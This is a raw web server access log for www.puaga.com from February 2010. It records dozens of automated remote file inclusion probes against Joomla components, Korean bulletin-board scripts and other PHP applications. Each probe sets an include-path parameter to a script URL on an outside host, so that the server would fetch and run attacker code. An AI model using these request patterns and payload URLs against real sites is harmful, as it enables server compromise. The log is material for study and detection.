125.141.196.78 - - [15/Feb/2010:04:49:28 -0800] "GET /includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [15/Feb/2010:04:49:28 -0800] "GET /logs/access_100112.log%20%20//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [15/Feb/2010:04:49:30 -0800] "GET /logs/access_100112.log%20%20//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [15/Feb/2010:04:49:30 -0800] "GET /includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [15/Feb/2010:04:49:30 -0800] "GET /logs//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [15/Feb/2010:04:49:32 -0800] "GET /logs/access_100117.log%20%20//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [15/Feb/2010:04:49:37 -0800] "GET /logs/access_100117.log%20%20//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [15/Feb/2010:04:49:39 -0800] "GET /logs/access_100117.log%20%20//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [15/Feb/2010:04:49:42 -0800] "GET /logs/access_100117.log%20%20//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [15/Feb/2010:04:49:44 -0800] "GET /logs/access_100117.log%20%20//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [15/Feb/2010:04:49:59 -0800] "GET /logs/access_100130.log/mcf.php?content=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.250.92.167 - - [15/Feb/2010:04:50:27 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 200 3642 "-" "libwww-perl/5.805" "www.puaga.com"
61.250.92.167 - - [15/Feb/2010:04:50:29 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 200 4947 "-" "libwww-perl/5.805" "www.puaga.com"
211.180.124.146 - - [15/Feb/2010:04:51:53 -0800] "GET /board//skin/board/RINIX_3//delete_all.tail.skin.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [15/Feb/2010:04:51:53 -0800] "GET /logs//board//skin/board/RINIX_3//delete_all.tail.skin.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [15/Feb/2010:04:51:53 -0800] "GET /logs/access_100207.log//board//skin/board/RINIX_3//delete_all.tail.skin.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [15/Feb/2010:04:51:56 -0800] "GET /logs/access_100111.log//include/write.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [15/Feb/2010:04:51:57 -0800] "GET /logs/access_100205.log//include/write.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [15/Feb/2010:04:51:57 -0800] "GET /logs//delete_comment.php?board_skin_path=http://www.parisplayground.com/paris/amateur/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [15/Feb/2010:04:51:58 -0800] "GET /logs/access_100205.log//delete_comment.php?board_skin_path=http://www.parisplayground.com/paris/amateur/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [15/Feb/2010:04:51:58 -0800] "GET /delete_comment.php?board_skin_path=http://www.parisplayground.com/paris/amateur/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [15/Feb/2010:04:52:01 -0800] "GET /board//skin/board/RINIX_3//delete_all.tail.skin.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [15/Feb/2010:04:52:01 -0800] "GET /logs/access_100207.log//board//skin/board/RINIX_3//delete_all.tail.skin.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [15/Feb/2010:04:52:01 -0800] "GET /logs//board//skin/board/RINIX_3//delete_all.tail.skin.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [15/Feb/2010:04:52:02 -0800] "GET /board//skin/board/RINIX_3//delete_all.tail.skin.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [15/Feb/2010:04:52:09 -0800] "GET /logs//board//skin/board/RINIX_3//delete_all.tail.skin.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [15/Feb/2010:04:52:10 -0800] "GET /logs/access_100207.log//board//skin/board/RINIX_3//delete_all.tail.skin.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [15/Feb/2010:04:52:10 -0800] "GET /logs//board//skin/board/RINIX_3//delete_all.tail.skin.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [15/Feb/2010:04:52:10 -0800] "GET /board//skin/board/RINIX_3//delete_all.tail.skin.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [15/Feb/2010:04:52:10 -0800] "GET /logs/access_100207.log//board//skin/board/RINIX_3//delete_all.tail.skin.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.199.140.158 - - [15/Feb/2010:04:53:20 -0800] "GET /logs/access_100208.log/index.php?stranica=http://ebaroque.co.kr/page/1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.17.139.19 - - [15/Feb/2010:04:53:21 -0800] "GET /logs/access_100119.log/errors.php?error=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/3.0 (OS/2; U)" "www.puaga.com"
85.17.139.19 - - [15/Feb/2010:04:53:21 -0800] "GET /errors.php?error=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/3.0 (OS/2; U)" "www.puaga.com"
85.17.139.19 - - [15/Feb/2010:04:53:21 -0800] "GET /logs/errors.php?error=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/3.0 (OS/2; U)" "www.puaga.com"
85.17.139.19 - - [15/Feb/2010:04:53:21 -0800] "GET /logs/access_100111.log/errors.php?error=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/3.0 (OS/2; U)" "www.puaga.com"
85.17.139.19 - - [15/Feb/2010:04:53:47 -0800] "GET /logs/access_100119.log/errors.php?error=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.puaga.com"
85.17.139.19 - - [15/Feb/2010:04:53:47 -0800] "GET /errors.php?error=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.puaga.com"
85.17.139.19 - - [15/Feb/2010:04:53:47 -0800] "GET /logs/errors.php?error=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.puaga.com"
85.17.139.19 - - [15/Feb/2010:04:53:47 -0800] "GET /logs/access_100111.log/errors.php?error=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.puaga.com"
174.36.1.51 - - [15/Feb/2010:04:54:13 -0800] "GET /logs/access_100202.log/components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.36.1.51 - - [15/Feb/2010:04:54:13 -0800] "GET /logs/access_100111.log/components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
112.78.112.81 - - [15/Feb/2010:04:54:50 -0800] "GET /logs/access_100104.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.250.92.167 - - [15/Feb/2010:04:55:05 -0800] "GET /logs/access_100103.log//?_SERVER[DOCUMENT_ROOT]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
61.63.82.14 - - [15/Feb/2010:04:55:05 -0800] "GET /logs//delete_comment.php?board_skin_path=http://www.parisplayground.com/paris/amateur/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [15/Feb/2010:04:55:05 -0800] "GET /delete_comment.php?board_skin_path=http://www.parisplayground.com/paris/amateur/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [15/Feb/2010:04:55:08 -0800] "GET /logs/access_100205.log%20%20//delete_comment.php?board_skin_path=http://www.parisplayground.com/paris/amateur/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.36.1.51 - - [15/Feb/2010:04:55:31 -0800] "GET /logs/access_100202.log/components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
112.78.112.81 - - [15/Feb/2010:04:55:39 -0800] "GET /logs/access_100115.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.126.254.164 - - [15/Feb/2010:04:56:11 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.qqe.ru/forum/echo/idsatu.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.126.254.164 - - [15/Feb/2010:04:56:11 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.qqe.ru/forum/echo/idsatu.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.126.254.164 - - [15/Feb/2010:04:56:11 -0800] "GET /logs/access_100130.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.qqe.ru/forum/echo/idsatu.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.113.233.182 - - [15/Feb/2010:04:56:25 -0800] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://czerwiensk.com.pl/Cantilena/uploads/news/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.113.233.182 - - [15/Feb/2010:04:56:25 -0800] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://czerwiensk.com.pl/Cantilena/uploads/news/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.113.233.182 - - [15/Feb/2010:04:56:25 -0800] "GET /logs/access_100130.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://czerwiensk.com.pl/Cantilena/uploads/news/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.113.233.182 - - [15/Feb/2010:04:56:45 -0800] "GET /logs/access_100125.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://czerwiensk.com.pl/Cantilena/uploads/news/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:04:57:01 -0800] "GET /logs/access_100208.log/errors.php?error=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:04:57:01 -0800] "GET /logs/access_100208.log/errors.php?error=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:04:57:18 -0800] "GET /logs/access_100109.log/errors.php?error=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:04:57:20 -0800] "GET /logs/access_100109.log/errors.php?error=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.7.235.75 - - [15/Feb/2010:04:57:28 -0800] "GET /logs/access_100202.log//?_SERVER[DOCUMENT_ROOT]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
209.126.254.164 - - [15/Feb/2010:04:57:51 -0800] "GET /logs/access_100206.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.qqe.ru/forum/echo/idsatu.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:04:58:02 -0800] "GET /logs/access_100208.log/errors.php?error=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.55.115.174 - - [15/Feb/2010:04:58:11 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:04:58:13 -0800] "GET /logs/access_100109.log/errors.php?error=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.111.172 - - [15/Feb/2010:04:58:45 -0800] "GET /logs/access_100122.log HTTP/1.0" 200 1199973 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:04:58:53 -0800] "GET /logs/access_100208.log/errors.php?error=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.70.47 - - [15/Feb/2010:04:59:04 -0800] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://czerwiensk.com.pl/Cantilena/uploads/news/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.70.47 - - [15/Feb/2010:04:59:04 -0800] "GET /logs/access_100130.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://czerwiensk.com.pl/Cantilena/uploads/news/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.70.47 - - [15/Feb/2010:04:59:04 -0800] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://czerwiensk.com.pl/Cantilena/uploads/news/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:04:59:06 -0800] "GET /logs/access_100109.log/errors.php?error=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.70.47 - - [15/Feb/2010:04:59:09 -0800] "GET /logs/access_100125.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://czerwiensk.com.pl/Cantilena/uploads/news/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.108.236.148 - - [15/Feb/2010:04:59:19 -0800] "GET /logs/access_100125.log%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.108.236.148 - - [15/Feb/2010:04:59:19 -0800] "GET /logs/access_100202.log%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [15/Feb/2010:05:00:10 -0800] "GET /logs/access_100125.log%20%20//delete_comment.php?board_skin_path=http://www.parisplayground.com/paris/amateur/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [15/Feb/2010:05:00:21 -0800] "GET /logs/access_100127.log/home//conlib/local.php?cfg[path][contenido]=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.puaga.com"
61.63.82.14 - - [15/Feb/2010:05:00:21 -0800] "GET /logs/home//conlib/local.php?cfg[path][contenido]=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.puaga.com"
61.63.82.14 - - [15/Feb/2010:05:00:21 -0800] "GET /home//conlib/local.php?cfg[path][contenido]=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.puaga.com"
61.63.82.14 - - [15/Feb/2010:05:00:53 -0800] "GET /logs/access_100129.log/home//conlib/local.php?cfg[path][contenido]=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.puaga.com"
92.243.15.85 - - [15/Feb/2010:05:01:33 -0800] "GET /logs/access_100121.log//components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
92.243.15.85 - - [15/Feb/2010:05:01:33 -0800] "GET /logs//components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
92.243.15.85 - - [15/Feb/2010:05:01:33 -0800] "GET /components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:05:02:47 -0800] "GET /logs//bbs/write_comment_update.php///inctech2/bbs/write_comment_update.php//write_comment_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:05:02:47 -0800] "GET /bbs/write_comment_update.php///inctech2/bbs/write_comment_update.php//write_comment_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:05:02:47 -0800] "GET /logs/access_100210.log%20%20//bbs/write_comment_update.php///inctech2/bbs/write_comment_update.php//write_comment_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:05:03:35 -0800] "GET /logs/access_100202.log%20%20//bbs/write_comment_update.php///inctech2/bbs/write_comment_update.php//write_comment_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [15/Feb/2010:05:03:59 -0800] "GET /logs/access_100116.log%20%20/bad_link.php?theme_path=http://millwide.com.br/images/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [15/Feb/2010:05:03:59 -0800] "GET /logs/bad_link.php?theme_path=http://millwide.com.br/images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [15/Feb/2010:05:03:59 -0800] "GET /bad_link.php?theme_path=http://millwide.com.br/images/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [15/Feb/2010:05:04:06 -0800] "GET /logs/access_100111.log%20%20/bad_link.php?theme_path=http://millwide.com.br/images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:05:04:23 -0800] "GET /logs/access_100202.log%20%20///bbs/delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:05:04:23 -0800] "GET /logs///bbs/delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:05:04:23 -0800] "GET //bbs/delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [15/Feb/2010:05:04:44 -0800] "GET /logs/access_100116.log/bad_link.php?theme_path=http://millwide.com.br/images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:05:04:48 -0800] "GET /logs/access_100128.log%20%20///bbs/delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [15/Feb/2010:05:04:48 -0800] "GET /logs/access_100111.log/bad_link.php?theme_path=http://millwide.com.br/images/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:05:04:55 -0800] "GET /logs///bbs/delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:05:04:55 -0800] "GET //bbs/delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:05:04:55 -0800] "GET /logs/access_100202.log%20%20///bbs/delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [15/Feb/2010:05:05:12 -0800] "GET /include.php?path[docroot]=http://millwide.com.br/images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [15/Feb/2010:05:05:12 -0800] "GET /logs//include.php?path[docroot]=http://millwide.com.br/images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [15/Feb/2010:05:05:12 -0800] "GET /logs/access_100123.log//include.php?path[docroot]=http://millwide.com.br/images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
92.243.15.85 - - [15/Feb/2010:05:05:14 -0800] "GET /logs/access_100121.log%20%20//components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:05:05:21 -0800] "GET /logs/access_100128.log%20%20///bbs/delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
92.243.15.85 - - [15/Feb/2010:05:05:51 -0800] "GET /logs/access_100124.log%20%20//components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:05:06:08 -0800] "GET /errors.php?error=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:05:06:08 -0800] "GET /logs/access_100114.log%20%20/errors.php?error=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:05:06:08 -0800] "GET /logs/errors.php?error=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:05:06:20 -0800] "GET /logs/access_100114.log%20%20/errors.php?error=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:05:06:20 -0800] "GET /errors.php?error=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:05:06:20 -0800] "GET /logs/errors.php?error=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:05:06:22 -0800] "GET /logs/errors.php?error=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:05:06:22 -0800] "GET /logs/access_100114.log%20%20/errors.php?error=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:05:06:22 -0800] "GET /errors.php?error=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
